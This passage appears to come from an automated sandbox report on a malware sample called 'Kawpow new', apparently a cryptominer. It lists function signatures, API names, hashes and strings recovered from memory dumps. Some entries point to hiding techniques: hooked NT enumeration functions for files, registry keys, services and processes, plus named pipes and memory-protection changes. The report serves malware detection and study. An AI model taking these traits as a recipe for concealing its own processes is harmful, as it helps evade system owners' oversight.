                          • API ID: CurrentThread$AddressHandleModuleProc
                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                          • API String ID: 4175298099-1975688563
                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction ID: 66ec0c77d005c83a4f0c2f9a9399ce50693a1e86d25bd3e750c7830ed6cdc325
                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction Fuzzy Hash: BC31E56411990EE4EE04EF65EC696D66368B70C344F8E00D3D86E225719F38CE49C3B2

                          Control-flow Graph

                          control_flow_graph: function at 27e82326910 (entry block 27e82326910-27e82326916); graph edge data and executed/not-executed colouring omitted. CRT routines named in the graph: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: ffee0eacb1c96b091f78b166d96eb4de203646e40c9847f1c54161d864085971
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: 0F81D46170C6438EFE549B25D47D35B22A9EF8CB83F0680E5990D433B6DB38CE458B22

                          Control-flow Graph

                          control_flow_graph: function at 27e8247ce28 (entry block 27e8247ce28-27e8247ce4a); graph edge data and executed/not-executed colouring omitted. API calls named in the graph: GetLastError, FlsGetValue, FlsSetValue, SetLastError.
                          APIs
                          • GetLastError.KERNEL32 ref: 0000027E8247CE37
                          • FlsGetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CE4C
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CE6D
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CE9A
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CEAB
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CEBC
                          • SetLastError.KERNEL32 ref: 0000027E8247CED7
                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF0D
                          • FlsSetValue.KERNEL32(?,?,00000001,0000027E8247ECCC,?,?,?,?,0000027E8247BF9F,?,?,?,?,?,0000027E82477AB0), ref: 0000027E8247CF2C
                            • Part of subcall function 0000027E8247D6CC: HeapAlloc.KERNEL32 ref: 0000027E8247D721
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF54
                            • Part of subcall function 0000027E8247D744: HeapFree.KERNEL32 ref: 0000027E8247D75A
                            • Part of subcall function 0000027E8247D744: GetLastError.KERNEL32 ref: 0000027E8247D764
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF65
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF76
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast$Heap$AllocFree
                          • String ID:
                          • API String ID: 570795689-0
                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction ID: 9cb62cab20768c3a0c8639e6a61ccd162ca14b37d41cf502d0d6a4056217ea52
                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction Fuzzy Hash: 7141732020D64C49FE68A735955D36B118E9B4CBB0F1F0BA4AC3F567F6DE299C018633

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                          • API String ID: 2171963597-1373409510
                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction ID: 334a7f7215c3f5757749e1a7a21908b2866cde8e299582fe9df92aa4b8c2af2b
                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction Fuzzy Hash: E3216A32628B4083EF50CB25F44875A63A5F789BA4F590255EA6D12BB8CF7CC949CF21

                          Control-flow Graph

                          control_flow_graph: function at 27e8247a544 (entry block 27e8247a544-27e8247a5ac); graph edge data and executed/not-executed colouring omitted. No Windows API calls are named in the graph, only internal calls.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction ID: 78ef4d805040892aa295baaae9bafa47688721c43ed7f0c1bbfa77adaaec4f9b
                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction Fuzzy Hash: 74E1E4726087988EEF20DF25D44839E77A8F748B98F0A0155EE9D57BA5CB34C891C732

                          Control-flow Graph

                          control_flow_graph: function at 27e82329944 (entry block 27e82329944-27e823299ac); graph edge data and executed/not-executed colouring omitted. No Windows API calls are named in the graph, only internal calls.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction ID: ea549e61dd8eef3cc77149adb4771f300c504a009f75e0aa9006d7146f94dc58
                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction Fuzzy Hash: A0E1E3726087828EEF60DF25D46839E77A8F74DB89F214146EE8D47B65CB34D890C722

                          Control-flow Graph

                          control_flow_graph: function at 27e8247f394 (entry block 27e8247f394-27e8247f3e6); graph edge data and executed/not-executed colouring omitted. API calls named in the graph: LoadLibraryExW, GetLastError, GetProcAddress, FreeLibrary.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3013587201-537541572
                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction ID: f51ce8003fd60c6985a796fbef00ca5ce497e9b1a938781a1733ed6547d4492f
                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction Fuzzy Hash: 38410622329A0896EE16CB16A80875723D9F75DBA0F0F41759D2E977E5EE3CCC458332

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction ID: 46868de19e64390b1342488d1c40d1ac490e832497282edde8a2cdcd4e8608ae
                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction Fuzzy Hash: 58418333614B84CAEB61CF21E44879B77A5F38CB88F088115DA9E0B768DF38C845CB21

                          Control-flow Graph

                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D087
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0A6
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0CE
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0DF
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Value
                          • String ID: 1%$Y%
                          • API String ID: 3702945584-1395475152
                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction ID: a0a4bd4a9a3a126293e5fcd1e44bd794fb686e9caae2016a805d626971f348f8
                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction Fuzzy Hash: 2611D32031C28C89FE685735955D32B21499B4C7F0F1E57A4A83E167FADF2ACC028A32
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 85d14b5ce1170814f116d264cc1d671d96cd4ef0ac6e0d2e00dff1ea35947868
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: AC81E52060E7095EFF509B29984835B229CA74DB80FBF44A5992D577B6DB38CC45C733
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction ID: 7ac029ff9104a3e757eb1555a1f151cf6447563269221e35a56d8629204bff3e
                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction Fuzzy Hash: 3E31C43121AA44A9EE62DB06A508766239CF74CBA0F5F09659D3D4B3E1DF38C8458732
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction ID: 85771f7f7506cc7abf9c456a07ee6b88b8ab163ba1322cce65719d2cc73cb04d
                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction Fuzzy Hash: 35116621728B4086EB508B52E85832666A8F78CFE4F194254ED6E977B5CF38CC14C765
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID: wr
                          • API String ID: 1092925422-2678910430
                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction ID: 760b34f18aff27506b38a17b131c07975f5aa5e40aae9b182d44afd125cb8597
                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction Fuzzy Hash: FA11CE26718B4086EF549B15E00822A67A8F74CB80F0A4168DEAD07764EF3DC904C725
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction ID: ca057b8e87035d885d0b5c76f44d0cf1c90f5f7cc1cdeb4e43703aa21b1808df
                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction Fuzzy Hash: 14D1B776209B8886DE709B0AE49835B77A4F38CB84F550156EE9E47BB5CF3CC941CB21
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: dialer
                          • API String ID: 756756679-3528709123
                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction ID: c0eaa3c0378b0a4676cf3252683d1a4cf67495ee04aa8f1044a485ed5136ed58
                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction Fuzzy Hash: 4F31A022709B5986EE51CF16A54872B67A8FB48B84F0E80619E5D07B65EB34CC618731
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction ID: 15e84eea571a6569cdb3297f5b8af2f52b5b34861a8dcc622727a6bf1b9f1103
                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction Fuzzy Hash: 2411752021C68889FE649735955D72B114A9B4C7F4F1F1794AC3F577FADE298C028632
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction ID: 340c66f2abfb511757de52f8c02a32c8358d8597c78b9784b9376fbdf383ec2d
                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction Fuzzy Hash: 10018721718A4086EE90DB12A84C75A63AAF78CBC0F894075DE6E53765DF38C989C731
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction ID: 37b8b8d4942877810276d20b4c6505214c29f2c6d25351851db2017f0af07fe2
                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction Fuzzy Hash: 2701AD2422AB0486EF64DB25E80C31763A8BB4DB82F0940A5CD6D17371EF3CC808CB32
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: d320389ff1473aef7197522de0cbb1c732e2f146618a6140aa97fff1bdcdcd3a
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: BA51D3323192048EEF55CB15E44CB5A37AEF348B98F1A85A4DA2E477A8DB35CC50C732
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: 389b28a30f08270f4db65a512fd394a0b983e66272f470b56b8000b97d759a68
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: BB31D3322186549AEF10DF15E84C71A37A9F348B88F0A8494EE6E07765DB39CD40C736
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction ID: 1445761c416837469800c74d39d94992e18f3c4f03bd59e78e857a5fb28a8a32
                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction Fuzzy Hash: D2F0A42231864482EF708F20F88875B6368F74CB88F894061CA5D46968DF7CCA4DCB31
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction ID: b0898f34afa80fb3da0b1845de999e96c142b01d9feb912c10886c389432ea75
                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction Fuzzy Hash: 23F06261229B0485EF108F24E45C36B6364EB8DB71F594299CA7E591F4DF2CC9498731
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction ID: dd8ca9ad19d192c60e398a5f4d12f2331c03ade3fd6d3dfbc97bd29f5df517e1
                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction Fuzzy Hash: D8F05E24628B8482EE408B56B90811A6668AB4CFC0F0D8060EE6E17B28DF68C8458731
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction ID: adb762ff600620127f88250a0bfcf225fee2b6cde49f655231d376bd16a9f0a7
                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction Fuzzy Hash: 5902C83261DB848AEF60CB55E49435BB7A4F3C8794F150055EA9E8BBA8DF7CC844CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction ID: f8ab940eac013dfb1372cb0400e75f86d9130a933e34762150a6bb4dac62b407
                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction Fuzzy Hash: 7661B93651DB88CAEF608B15E44831B77A8F38C794F560156EA9E47BB8DB7CC850CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 7a636a94bd693e2dd5c119516f8678fc2afad9f43fb05dd7f4b415a8fd5bdda4
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 3A119136A3CA9011FE661569D45D37711486B6C3B8F0F06A4A97E36BF68B28CC415232
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 7cc12534f95d05cc2d46c02f76ce01ecfeda7169004729fea027e83a0758231e
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 3A11EB6361CA0305FE541118F47D3671088AB5CB70F4BC6ACB96E0A2F6C624CF4042A3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          • API String ID: 3215553584-4202648911
                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction ID: 13a42f2f6befb9d6478211def2324680c5e33699a3c8552b0d2852b901ddbb96
                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction Fuzzy Hash: 9F61E37660C2164AFE659B25E57C32B26A8E75D742F834495CA0E137FCDA34DC428333
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: bd52c99d913391ad94a13eaa876bd6232107cd9e8b0031c306a36dca8e98eb07
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 7E617A33608B888AEF10DF65D44439E77A4F348B88F094255EF6D17BA8DBB8C995C721
                          APIs
                          Strings
                          Memory Dump Source
